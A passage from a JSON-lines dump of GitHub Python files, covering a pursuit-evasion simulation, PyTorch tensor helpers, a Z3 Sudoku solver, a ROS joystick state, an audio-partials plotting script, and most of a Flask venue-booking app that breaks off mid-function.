np.array(vp)\n\n for i in range(1, 3):\n points[i] = points[i] + vp[i-1]\n\n\n # evader运动策略 随机运动 最大速度为1\n # Ve_x = E_[0][0] - points[0][0]\n # Ve_x = random.uniform(-0.2, 0.2)\n # Ve_y = random.uniform(E_[0][1], E_[1][1]) - points[0][1]\n # Ve_y = np.sqrt(0.04-np.square(Ve_x))\n if evader_strategy.empty():\n # 队列中不存在策略\n if points[0][0] == d[0] and points[0][1] == d[1]:\n # 到达上次设定的目的地\n D = [0, 0]\n else:\n # 未到达上次设定的目的地\n D = d / (step * np.sqrt(np.sum(np.square(d - points[0]))))\n else:\n # 队列中存在策略,获取策略,更新D值\n evader_ = evader_strategy.get()\n d = 
[evader_[0] - points[0][0], evader_[1] - points[0][1]]\n d = np.array(d)\n D = d / (step * np.sqrt(np.sum(np.square(d))))\n\n\n points[0] = points[0] + D\n\n for i in range(0, 3):\n if points[i][0] > bounding_box[1]:\n points[i][0] = bounding_box[1]\n\n if points[i][0] < bounding_box[0]:\n if points[i][1] >= E_[1][1] and points[i][1] <= E_[0][1]:\n points[i][0] = bounding_box[0]\n\n if points[i][1] > bounding_box[3]:\n points[i][1] = bounding_box[3]\n\n if points[i][1] < bounding_box[2]:\n points[i][1] = bounding_box[2]\n\n ax[i] = points[i][0]\n ay[i] = points[i][1]\n\n plt.pause(0.0001)\n plt.ioff\n plt.show()\n\nif points[0][0] - D[0] < 0:\n print(\"Escape Successfully\")\nelse:\n print(\"Capture Successfully!\")\n\n","repo_name":"Freedom-Guo/Multi-Agent","sub_path":"voronoi_single_exit.py","file_name":"voronoi_single_exit.py","file_ext":"py","file_size_in_byte":24476,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"41800153861","text":"import numpy\nimport torch\nimport torch.nn as nn\nfrom torch.nn.utils.rnn import PackedSequence\n\nfrom thseq.utils.types import rset_attr\n\n\ndef mask_from_length(lens, maxlen=None):\n if not maxlen:\n maxlen = lens.max()\n\n range = torch.arange(0, maxlen).to(lens).expand(lens.size(0), -1)\n return range >= lens.view(-1,1)\n\n\ndef dropout(input, training: bool, dropout: nn.Dropout):\n if isinstance(input, PackedSequence):\n data = dropout(input.data)\n output = PackedSequence(data, input.batch_sizes)\n else:\n output = dropout(input)\n return output\n\n\ndef clip_grad_norm_(tensor, max_norm):\n grad_norm = torch.norm(tensor).item()\n if grad_norm > max_norm > 0:\n clip_coef = max_norm / (grad_norm + 1e-6)\n tensor.mul_(clip_coef)\n return grad_norm\n\n\ndef cuda(tensor_or_module, required=False):\n if tensor_or_module is None:\n return None\n if isinstance(tensor_or_module, numpy.ndarray):\n tensor_or_module = torch.tensor(tensor_or_module)\n\n if torch.cuda.is_available():\n tensor_or_module = tensor_or_module.cuda()\n elif required:\n raise RuntimeError('CUDA is required but not currently available.')\n\n return tensor_or_module\n\n\ndef get_parameters(outer, *exclude_from):\n paras = []\n for para in outer.parameters():\n exclude = False\n for item in exclude_from:\n if isinstance(item, nn.Module):\n other = list(item.parameters())\n else:\n other = [item]\n for para2 in other:\n if para is para2:\n exclude = True\n break\n if exclude:\n break\n if not exclude:\n paras.append(para)\n\n return paras\n\n\ndef share_parameters(module, share_to, strict=True):\n assert isinstance(module, nn.Module)\n assert isinstance(share_to, nn.Module)\n\n is_parameter = lambda name, module: any(name == name_ for name_, _ in module.named_parameters())\n\n for name, para in module.named_parameters():\n if not is_parameter(name, share_to):\n if strict :\n raise RuntimeError(f'{name} is not an attribute of to_module'\n f' or it\\'s not an instance of nn.Parameter')\n else:\n continue\n else:\n rset_attr(share_to, attr=name, val=para)\n\n\ndef pack_tensors(tensors, padding_value, dtype=None):\n dtype = dtype or tensors[0].dtype\n device = tensors[0].device\n lens = tensors[0].new_tensor([a.shape[0] for a in tensors])\n max_len = torch.max(lens)\n a = torch.zeros((len(tensors), int(max_len.item()))) + padding_value\n a = a.to(device=device, dtype=dtype)\n mask = torch.arange(max_len).to(device=device) < lens[:, None]\n a[mask] = torch.cat(tensors)\n return 
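get_outer_circle above threads through slopes and must special-case vertical edges; solving the two perpendicular-bisector equations 2(B-A).x = |B|^2 - |A|^2 and 2(C-B).x = |C|^2 - |B|^2 as one 2x2 linear system removes the case analysis:

import numpy as np

def circumcenter(A, B, C):
    A, B, C = (np.asarray(P, dtype=float) for P in (A, B, C))
    M = 2.0 * np.array([B - A, C - B])
    rhs = np.array([B @ B - A @ A, C @ C - B @ B])
    x = np.linalg.solve(M, rhs)       # singular only when the points are collinear
    return x, float(np.linalg.norm(x - A))

center, r = circumcenter((0, 0), (2, 0), (0, 2))
print(center, r)  # [1. 1.] 1.414...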
a\n","repo_name":"DeepLearnXMU/ABDNMT-RNMT","sub_path":"thseq/utils/tensor.py","file_name":"tensor.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"67"} +{"seq_id":"4154545297","text":"\"\"\"\nModule for solving Sudoku 9x9 puzzles using Z3.\n\"\"\"\nimport fileinput\nfrom typing import Dict, List, Tuple\n\nimport numpy as np\nimport pandas as pd\nfrom z3 import Distinct, Int, Solver, sat\n\n\ndef sudoku_solver(sudoku: List[str]) -> str:\n \"\"\"sudoku_solver solve the given sudoku using Z3\n\n Parameters\n ----------\n sudoku : List[str]\n List of 9 strings of length 9\n\n Returns\n -------\n str\n the solution string formatted with new line characters\n at every 3 characters.\n \"\"\"\n first_row = sudoku[0]\n # Only works on 9x9 (can be easily extended to general cases)\n assert (\n (np.array([len(r) for r in sudoku]) == len(first_row)).all()\n and len(first_row) == 9\n and len(sudoku) == 9\n )\n x = np.arange(len(sudoku))\n y = np.arange(len(first_row))\n s = Solver()\n board: Dict[Tuple[int, int], Int] = {}\n # board definition\n for i in x:\n for j in y:\n board[(i, j)] = Int(f\"({i:d},{j:d})\")\n s.add(board[(i, j)] <= 9, board[(i, j)] >= 1)\n\n for i in x:\n # distinct row\n s.add(Distinct([board[(i, j)] for j in y]))\n # distinct col\n s.add(Distinct([board[(j, i)] for j in y]))\n\n # distinct grid\n for i in range(3):\n for j in range(3):\n s.add(\n Distinct(\n [board[(m + i * 3, n + j * 3)] for m in range(3) for n in range(3)]\n )\n )\n # now we put the assumptions of the given puzzle into the solver:\n for i in x:\n for j in y:\n if sudoku[i][j] != \" \" and sudoku[i][j] != \".\":\n s.add(board[(i, j)] == int(sudoku[i][j]))\n\n assert s.check() == sat, \"Unsat\"\n\n model = s.model()\n solution = \"\\n\".join(\n [\"\".join([model.evaluate(board[(i, j)]).as_string() for j in y]) for i in x]\n )\n return solution\n\n\ndef std_input_to_sudoku() -> List[str]:\n \"\"\"std_input_to_sudoku read a sudoku puzzle from std-in\n\n Returns\n -------\n List[str]\n the processed sudoku puzzle\n \"\"\"\n sudoku = []\n for line in fileinput.input():\n line = line.rstrip(\"\\n\")\n assert len(line) == 9, \"Invalid length input. Can only solve 9x9.\"\n sudoku.append(line)\n if len(sudoku)==9:\n break\n return sudoku\n\n\ndef main():\n \"\"\"main solve a sudoku from stdin. Can use '.' 
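mask_from_length in the module above marks padding positions -- True where the index is at or past the sequence length. A quick check of that convention:

import torch

lens = torch.tensor([2, 4])
rng = torch.arange(0, 4).to(lens).expand(lens.size(0), -1)
print(rng >= lens.view(-1, 1))
# tensor([[False, False,  True,  True],
#         [False, False, False, False]])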
or ' ' for empty cells.\n i.e.\n...2857..\n.193.....\n.8...1.6.\n.45.6....\n.27...14.\n....5.68.\n.3.9...5.\n.....347.\n..1528...\n \"\"\"\n puzzle = std_input_to_sudoku()\n s_solved = sudoku_solver(puzzle)\n print(s_solved)\n\n\ndef test_validity():\n \"\"\"test_validity test validity of the algorithm on a sudoku dataset.\n 100 sudoku sampled from:\n https://www.kaggle.com/datasets/radcliffe/3-million-sudoku-puzzles-with-ratings\n \"\"\"\n df = pd.read_csv(\"assets/sudoku.csv\")\n sudokus = df[\"puzzle\"].apply(lambda x: np.array(list(x)).reshape(9, 9))\n solutions = sudokus.apply(lambda x: sudoku_solver(x).replace(\"\\n\", \"\"))\n assert (df[\"solution\"] == solutions).all()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fostiropoulos/theorem-prover","sub_path":"sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8452075841","text":"#!/usr/bin/env python\n# Intro to Robotics - EE5900 - Spring 2017\n# Final Project\n# Philip (Team Lead)\n# Ian\n# Akhil\n#\n# Revision: v1.2\n\n# imports\nimport rospy\nimport smach\nimport smach_ros\nfrom sensor_msgs.msg import Joy\n\nclass JoystickButtonPause(smach.State):\n def __init__(self, topic, button, timeout=None):\n super(JoystickButtonPause, self).__init__(outcomes=['BUTTON_PRESSED', 'BUTTON_NEVER_PRESSED'])\n self.button_pause = button\n self.topic = topic\n self.timeout = timeout\n\n def execute(self, userdata):\n while not rospy.is_shutdown():\n try:\n payload = rospy.wait_for_message(self.topic, Joy, timeout=self.timeout)\n\n if payload.buttons[self.button_pause]:\n return 'BUTTON_PRESSED'\n except (rospy.ROSException, rospy.ROSInterruptException) as e:\n rospy.logwarn(e)\n continue\n\n return 'BUTTON_NEVER_PRESSED'\n\n# standard ros boilerplate\nif __name__ == \"__main__\":\n try:\n rospy.init_node('joystick_state')\n joy = JoystickButtonPause('/bluetooth_teleop/joy', 0)\n joy.execute([])\n except rospy.ROSInterruptException:\n pass\n","repo_name":"pdscraml/bunny-hunter","sub_path":"catkin_ws/src/easter_egg_hunt/scripts/joystick.py","file_name":"joystick.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42513738160","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[9]:\n\n\nimport numpy as np\nimport plotly.offline as py\nimport plotly.graph_objs as go\nfrom scipy.interpolate import interp1d\nimport scipy.io as sio\nfrom random import randint\nimport json\nimport os\nimport sys\nimport sounddevice as sd\nimport soundfile as sf\nimport h5py\n\nsys.path.append('./src')\n\nimport additive_synth\nfrom rescale import rescale\n\nnp.set_printoptions(threshold=9999)\n\n# In[3]:\n\n# Initialize\n\nbpm = 120\nppqn = 48\nsmoothing_level = 0 # from 0 to 2 (int)\ninput_filename = 'higurashi_1.mat'\n\n\n# In[2]:\n\n\ndef get_envelope(input_signal, repeat=1):\n # Taking the absolute value\n t = np.arange(input_signal.shape[-1])\n\n absolute_signal = abs(input_signal)\n\n signal = absolute_signal\n\n for i in range(repeat):\n # Peak detection\n ## Init\n isPeak = np.zeros(signal.shape[-1], dtype=bool)\n last_idx = signal.shape[-1] - 1\n\n ## Define subfunction\n def find_prev_specimen():\n if sample_idx == 0:\n return 0.\n return signal[sample_idx - 1]\n\n def find_next_specimen():\n if sample_idx == last_idx:\n return 0.\n return signal[sample_idx + 1]\n\n ## Main\n for sample_idx, sample in 
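The whole Sudoku encoding above rests on two ingredients -- per-cell range bounds and z3.Distinct -- shown here in miniature on a single four-cell row with one clue:

from z3 import Distinct, Int, Solver, sat

cells = [Int(f"c{i}") for i in range(4)]
s = Solver()
s.add([c >= 1 for c in cells])
s.add([c <= 4 for c in cells])
s.add(Distinct(cells))      # all four values pairwise different
s.add(cells[0] == 2)        # a given clue
assert s.check() == sat
m = s.model()
print([m.evaluate(c) for c in cells])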
enumerate(signal):\n if sample_idx in [0, last_idx]:\n isPeak[sample_idx] = True\n continue\n prev_specimen = find_prev_specimen()\n next_specimen = find_next_specimen()\n if prev_specimen < sample and sample > next_specimen:\n isPeak[sample_idx] = True\n\n if np.sum(isPeak) < 6:\n for i in range(6 - np.sum(isPeak)):\n isPeak[randint(0, len(isPeak)) - 1] = True\n\n peaks_signal = signal[isPeak]\n peaks_time = t[isPeak]\n\n f = interp1d(peaks_time, peaks_signal, kind='cubic')\n signal = f(t)\n\n # signal = np.interp(t, peaks_time, peaks_signal)\n envelope = signal\n return envelope\n\n# %%\nwith h5py.File('./mat/' + input_filename, 'r') as mat_contents:\n print(mat_contents.keys())\n print('Importing...')\n p = np.array(mat_contents['p']).T[:, ::10]\n t = np.array(mat_contents['t']).flatten()[::10]\n freqs = np.array(mat_contents['f']).flatten()\n endtime = np.array(mat_contents['endtime'])[0][0]\n print('Successfully imported!')\n\n# In[10]: Plot Spectrogram\n# # CAUTION: Plotting spectrogram may take a lot of time\n\ndef setup_fig():\n trace = go.Heatmap(\n x=t[::100],\n y=np.log10(freqs),\n z=np.log10(p[:, ::100]),\n )\n\n data = [trace]\n\n layout = go.Layout(\n title='Partial Data',\n height=720,\n scene=dict(\n xaxis=dict(\n title=dict(\n text='Time',\n ),\n ),\n yaxis=dict(\n title=dict(\n text='Frequency',\n ),\n autorange=False\n ),\n )\n )\n return go.Figure(data, layout)\n\n\npy.plot(setup_fig(), filename='./plotly/spectrogram_p.html')\n\n# In[7]:\n\n\nn_ticks = int(endtime / 60 * bpm * ppqn)\nticks = np.linspace(0., endtime, num=n_ticks)\nmidi_amplitude = np.empty(shape=[p.shape[0], n_ticks])\nfor i, p_row in enumerate(p):\n envelope = get_envelope(p_row, smoothing_level + 1)\n midi_amplitude[i] = abs(np.interp(ticks, t, envelope))\n\n\n# In[10]: Plot Spectrogram\ndef setup_fig():\n trace = go.Heatmap(\n x=ticks[::10],\n y=np.log10(freqs),\n z=np.log10(midi_amplitude[:, ::10]),\n )\n\n data = [trace]\n\n layout = go.Layout(\n title='Partial Data',\n height=720,\n scene=dict(\n xaxis=dict(\n title=dict(\n text='Time',\n ),\n ),\n yaxis=dict(\n title=dict(\n text='Frequency',\n ),\n autorange=False\n ),\n )\n )\n return go.Figure(data, layout)\n\n\npy.plot(setup_fig(), filename='./plotly/spectrogram_midi.html')\n\n# In[10]:\n\n\namps_2d = midi_amplitude\n\nn_times = amps_2d.shape[1]\nn_freqs = amps_2d.shape[0]\n\ntimes_2d = np.empty(shape=(1, n_times))\ntimes_2d[0, :] = ticks\ntimes_2d = np.repeat(times_2d, n_freqs, axis=0)\n\nfreqs_2d = np.empty(shape=(n_freqs, 1))\nfreqs_2d[:, 0] = freqs\nfreqs_2d = np.repeat(freqs_2d, n_times, axis=1)\n\nx = times_2d.flatten()\ny = freqs_2d.flatten()\nz = amps_2d.flatten()\n\npoints = np.column_stack([x, y, z])\n\n\n# In[12]: Plot Scatter\n\ndef setup_fig():\n trace = go.Scatter3d(\n x=points[::10, 0],\n y=points[::10, 1],\n z=points[::10, 2],\n mode='markers',\n marker=dict(\n size=2,\n opacity=0.8,\n color=np.log(points[::10, 2] * 255)\n )\n )\n\n data = [trace]\n\n layout = go.Layout(\n title='Partial Data',\n hovermode='closest',\n height=900,\n margin=dict(\n l=0,\n r=0,\n b=0,\n t=0\n ),\n scene=dict(\n xaxis=dict(\n title='Time',\n ticklen=5,\n gridwidth=2,\n ),\n yaxis=dict(\n title='Frequency',\n type='log',\n ticklen=5,\n gridwidth=2,\n ),\n zaxis=dict(\n title='Amplitude',\n ticklen=5,\n gridwidth=2,\n )\n )\n )\n return go.Figure(data, layout)\n\n\npy.plot(setup_fig(), filename='./plotly/partials.html')\n\n# %%\noutput_filename = os.path.splitext(input_filename)[0] + '.json'\n\nwith open('./output/json/' + output_filename, 'w') as 
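Editor's note: `get_envelope` above hand-rolls the peak detection before cubic interpolation. A hedged standalone sketch of the same envelope idea, using `scipy.signal.argrelextrema` for the peak-picking step instead of the manual neighbor comparison (the input signal here is a made-up damped sine, not the MATLAB data):

```python
import numpy as np
from scipy.signal import argrelextrema
from scipy.interpolate import interp1d

# toy input: rectified damped sine
sig = np.abs(np.sin(np.linspace(0, 20, 400)) * np.exp(-np.linspace(0, 2, 400)))
t = np.arange(sig.shape[-1])

peaks = argrelextrema(sig, np.greater)[0]            # indices of local maxima
peaks = np.concatenate(([0], peaks, [t[-1]]))        # keep endpoints so interp1d covers the range
envelope = interp1d(t[peaks], sig[peaks], kind='cubic')(t)
```

As in the original, the endpoints are forced into the peak set so the interpolant is defined over the full time axis.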
outfile:\n outobj = dict(partials=points.tolist())\n json.dump(outobj, outfile)\n\nprint('Result file is at')\nprint('./output/json/' + output_filename)\n\n","repo_name":"szk2s/sandbox","sub_path":"Process-Partial/from_matlab.py","file_name":"from_matlab.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20959723041","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport sys\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash,\\\n redirect, url_for, abort, make_response\nfrom flask_cors import CORS\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\nimport config\nfrom flask_migrate import Migrate\nfrom datetime import datetime\nimport traceback\nfrom model import setup_db, db, Venue, Show, Artist, VenueGenre, ArtistGenre\nfrom constants import FUTURE, PAST\n\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\nCORS(app)\napp.config.from_object('config')\nsetup_db(app)\n\n# flask migrate\nmigrate = Migrate(app, db)\n\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\n\ndef format_datetime(value, format='medium'):\n date = dateutil.parser.parse(value)\n # \"start_time\": \"2019-05-21T21:30:00.000Z\"\n if format == 'full':\n format=\"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format=\"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format)\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n\n#----------------------------------------------------------------------------#\n# Utils.\n#----------------------------------------------------------------------------#\n\ndef get_venues(venues_raw):\n \"\"\"\n Groups the venues by city,state as required by the venues page\n\n Parameters:\n venues_raw (list): list of venue objects to be transformed\n \n Returns:\n venues (list): Appropriately formatted venues, grouped by city and state\n \"\"\"\n venues = []\n try:\n #get distinct cities \n distinct_cities = set([(venue.city, venue.state) for venue in venues_raw])\n #prepare data\n for city,state in distinct_cities:\n venue_dict = {'city':city, 'state': state, 'venues':[]}\n venues_in_city = [{'id': venue.id,\\\n 'name': venue.name,\\\n 'num_upcoming_shows': len(venue.get_shows(FUTURE))}\\\n for venue in venues_raw\\\n if venue.city==city and venue.state==state]\n venue_dict['venues'] = venues_in_city\n venues.append(venue_dict)\n except Exception as e:\n raise e\n return venues\n\ndef get_artists(artists_raw):\n \"\"\"\n Formats the artists as required by the get artists endpoint\n\n Parameters:\n artists_raw (list): list of artist objects to be transformed\n \n Returns:\n artists (list): Appropriately formatted artists\n \"\"\"\n artists = []\n try:\n for artist in artists_raw:\n artists.append({\n 'id': artist.id,\n 'name': artist.name\n })\n except Exception as e:\n raise e\n return artists\n\n\ndef update_genres_venue(new_genres, venue):\n 
\"\"\"\n Updates genres for a venue with a new set of genres. Replaces the old genres with new \n\n Parameters:\n new_genres (list): List of new genres\n venue (Venue): Venue object that needs a genre update\n\n \"\"\"\n try:\n common_genres = [] # common between edit form and existing records \n \n # step 1: delete \n for genre in venue.genres:\n if genre.name in new_genres:\n common_genres.append(genre.name)\n else:\n db.session.delete(genre)\n\n # step 2: add new\n new_uncommon_genres = list(set(new_genres) - set(common_genres))\n for genre in new_uncommon_genres:\n vg = VenueGenre(venue_id=venue.id, name=genre)\n db.session.add(vg)\n\n except Exception as e:\n raise e\n\ndef update_genres_artist(new_genres, artist):\n \"\"\"\n Updates genres for an artist with a new set of genres. Replaces the old genres with new \n\n Parameters:\n new_genres (list): List of new genres\n artist (Artist): Artist object that needs a genre update\n\n \"\"\"\n try:\n common_genres = [] # common between edit form and existing records \n \n # step 1: delete \n for genre in artist.genres:\n if genre.name in new_genres:\n common_genres.append(genre.name)\n else:\n db.session.delete(genre)\n\n # step 2: add new\n new_uncommon_genres = list(set(new_genres) - set(common_genres))\n for genre in new_uncommon_genres:\n ag = ArtistGenre(artist_id=artist.id, name=genre)\n db.session.add(ag)\n\n except Exception as e:\n raise e\n\n\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n \"\"\"\n Get venues data\n \"\"\"\n try:\n result = Venue.query.all()\n data = get_venues(result)\n return render_template('pages/venues.html', areas=data);\n except Exception as e:\n print(\"Error occurred while fetching venues: \",e)\n print(traceback.format_exc())\n abort(500) \n \n\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n \"\"\"\n Implement case-insensitive search on artists with partial string search. 
\n \"\"\"\n try:\n search_term = request.form.get('search_term', '')\n results = Venue.query.order_by(Venue.id).filter(Venue.name.ilike('%{}%'.format(search_term))).all()\n match_count = len(results)\n if match_count == 0:\n response = {\n \"count\": match_count,\n \"data\": []\n }\n else:\n response = {\n \"count\": len(results),\n \"data\": [{\"id\":venue.id,\\\n \"name\": venue.name,\\\n \"num_upcoming_shows\": len(venue.get_shows(FUTURE))}\\\n for venue in results]\n }\n return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n except Exception as e:\n print(\"Error occurred while seraching for venues: \",e)\n print(traceback.format_exc())\n abort(500)\n \n\n@app.route('/venues/')\ndef show_venue(venue_id):\n \"\"\"\n shows the venue page with the given venue_id\n \"\"\"\n \n try:\n result = Venue.query.filter_by(id=venue_id).all()\n if len(result) == 0 :\n print(\"No result for found for venue id {}\".format(venue_id))\n abort(404)\n data = result[0].format_all()\n except Exception as e:\n print(\"Error occured while fetching data for venue \", e)\n print(traceback.format_exc())\n abort(500)\n \n return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n \"\"\"\n Get create venue form\n \"\"\"\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n \"\"\"\n Submit new venue form and persist\n \"\"\"\n try:\n request.get_data()\n genres = request.form.getlist('genres')\n venue_dict = request.form.to_dict()\n seeking_talent = venue_dict['seeking_talent'] == \"True\"\n venue = Venue(name=venue_dict['name'], city=venue_dict['city'], state=venue_dict['state'],\\\n address=venue_dict['address'], phone=venue_dict['phone'],\\\n facebook_link=venue_dict['facebook_link'],\\\n website_link=venue_dict['website_link'], image_link=venue_dict['image_link'],\\\n seeking_talent=seeking_talent, seeking_description=venue_dict['seeking_description'])\n venue.create(genres)\n flash('Venue ' + request.form['name'] + ' was successfully listed!')\n except Exception as e:\n print(\"Error while creating new venue: \", e)\n print(traceback.format_exc())\n flash('An error occurred. 
Venue ' + request.form['name'] + ' could not be listed.')\n abort(500)\n return render_template('pages/home.html')\n\n@app.route('/venues/<venue_id>', methods=['DELETE'])\ndef delete_venue(venue_id):\n \"\"\"\n Deletes venue from DB\n \"\"\"\n # TODO: Implement Delete Button on UI\n try:\n venue = Venue.query.get(venue_id)\n db.session.delete(venue)\n db.session.commit()\n flash('Deleted venue '+venue.name+' successfully!')\n return render_template('pages/home.html')\n except Exception as e:\n flash('Error occurred while deleting venue ' + venue.name)\n print(\"Error in deleting venue:: \",e)\n print(traceback.format_exc())\n db.session.rollback()\n abort(500)\n finally:\n db.session.close() \n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n \"\"\"\n Get artists\n \"\"\"\n try:\n result = Artist.query.with_entities(Artist.id,Artist.name).all()\n if len(result) == 0:\n print(\"No results found\")\n abort(404)\n data = get_artists(result)\n return render_template('pages/artists.html', artists=data)\n except Exception as e:\n print(\"Error occurred while fetching artists\", e)\n print(traceback.format_exc())\n abort(500)\n \n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n \"\"\"\n Implements case-insensitive search on artists with partial string search\n \"\"\"\n try:\n search_term = request.form.get('search_term', '')\n results = Artist.query.order_by(Artist.id).filter(Artist.name.ilike('%{}%'.format(search_term))).all()\n match_count = len(results)\n if match_count == 0:\n response = {\n \"count\": match_count,\n \"data\": []\n }\n else:\n response = {\n \"count\": len(results),\n \"data\": [{\"id\":artist.id,\\\n \"name\": artist.name,\\\n \"num_upcoming_shows\": len(artist.get_shows(FUTURE))}\\\n for artist in results]\n }\n return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n except Exception as e:\n print(\"Error occurred while searching for artists: \",e)\n print(traceback.format_exc())\n abort(500)\n\n@app.route('/artists/<artist_id>')\ndef show_artist(artist_id):\n \"\"\"shows the artist page with the given artist_id\"\"\"\n try:\n result = Artist.query.filter_by(id=artist_id).all()\n if len(result) == 0:\n print(\"No result found for artist id {}\".format(artist_id))\n abort(404) \n data = result[0].format_all()\n return render_template('pages/show_artist.html', artist=data)\n except Exception as e:\n print(\"Error occurred while fetching artist\", e)\n print(traceback.format_exc())\n abort(500)\n \n\n# Update\n# ----------------------------------------------------------------\n@app.route('/artists/<artist_id>/edit', methods=['GET'])\ndef edit_artist(artist_id):\n \"\"\"\n Get data for edit artist page\n \"\"\"\n form = ArtistForm()\n try:\n result = Artist.query.filter_by(id=artist_id).all()\n if len(result) == 0 :\n print(\"No result found for artist id {}\".format(artist_id))\n abort(404)\n data = result[0].format_all()\n artist = {\n \"id\": data[\"id\"],\n \"name\": data[\"name\"],\n \"genres\": data[\"genres\"],\n \"city\": data[\"city\"],\n \"state\": data[\"state\"],\n \"phone\": data[\"phone\"],\n \"website\": data[\"website\"],\n \"facebook_link\": data[\"facebook_link\"],\n \"seeking_venue\": data[\"seeking_venue\"],\n \"seeking_description\": data[\"seeking_description\"],\n \"image_link\": data[\"image_link\"]\n }\n # TODO: populate form with values from artist with ID <artist_id>\n return render_template('forms/edit_artist.html', form=form, 
artist=artist)\n except Exception as e:\n print(\"Error occurred while fetching data for artist \", e)\n print(traceback.format_exc())\n abort(500)\n\n@app.route('/artists/<artist_id>/edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n \"\"\"\n Takes values from the form submitted, and updates existing\n artist record with ID <artist_id> using the new attributes\n \"\"\"\n try:\n # get data from request\n request.get_data()\n new_genres = request.form.getlist('genres')\n artist_dict = request.form.to_dict()\n\n # get the record to update\n artist = Artist.query.get(artist_id)\n\n # update\n artist.name = artist_dict[\"name\"]\n artist.city = artist_dict[\"city\"]\n artist.state = artist_dict[\"state\"]\n artist.phone = artist_dict[\"phone\"]\n artist.facebook_link = artist_dict[\"facebook_link\"]\n update_genres_artist(new_genres, artist)\n db.session.commit()\n flash('Artist ' + request.form['name'] + ' was successfully edited!')\n return redirect(url_for('show_artist', artist_id=artist_id))\n except Exception as e:\n print(\"Error in updating records\",e)\n db.session.rollback()\n print(traceback.format_exc())\n abort(500)\n finally:\n db.session.close()\n\n\n@app.route('/venues/<venue_id>/edit', methods=['GET'])\ndef edit_venue(venue_id):\n \"\"\"\n Get data for edit venue page\n \"\"\"\n form = VenueForm()\n try:\n result = Venue.query.filter_by(id=venue_id).all()\n if len(result) == 0 :\n print(\"No result found for venue id {}\".format(venue_id))\n abort(404)\n data = result[0].format_all()\n venue = {\n \"id\": data[\"id\"],\n \"name\": data[\"name\"],\n \"genres\": data[\"genres\"],\n \"address\": data[\"address\"],\n \"city\": data[\"city\"],\n \"state\": data[\"state\"],\n \"phone\": data[\"phone\"],\n \"website\": data[\"website\"],\n \"facebook_link\": data[\"facebook_link\"],\n \"seeking_talent\": data[\"seeking_talent\"],\n \"seeking_description\": data[\"seeking_description\"],\n \"image_link\": data[\"image_link\"]\n }\n return render_template('forms/edit_venue.html', form=form, venue=venue)\n except Exception as e:\n print(\"Error occurred while fetching data for venue \", e)\n print(traceback.format_exc())\n abort(500)\n\n\n@app.route('/venues/<venue_id>/edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n \"\"\"\n Takes values from the form submitted, and updates existing\n venue record with ID <venue_id> using the new attributes\n \"\"\"\n try:\n # get data from request\n request.get_data()\n new_genres = request.form.getlist('genres')\n venue_dict = request.form.to_dict()\n\n # get the record to update\n venue = Venue.query.get(venue_id)\n\n # update\n venue.name = venue_dict[\"name\"]\n venue.city = venue_dict[\"city\"]\n venue.state = venue_dict[\"state\"]\n venue.address = venue_dict[\"address\"]\n venue.phone = venue_dict[\"phone\"]\n venue.facebook_link = venue_dict[\"facebook_link\"]\n update_genres_venue(new_genres, venue)\n db.session.commit()\n flash('Venue ' + request.form['name'] + ' was successfully edited!')\n return redirect(url_for('show_venue', venue_id=venue_id))\n except Exception as e:\n print(\"Error in updating records\",e)\n db.session.rollback()\n print(traceback.format_exc())\n abort(500)\n finally:\n db.session.close()\n\n# Create Artist\n# ----------------------------------------------------------------\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n \"\"\"\n Get artist form\n \"\"\"\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef 
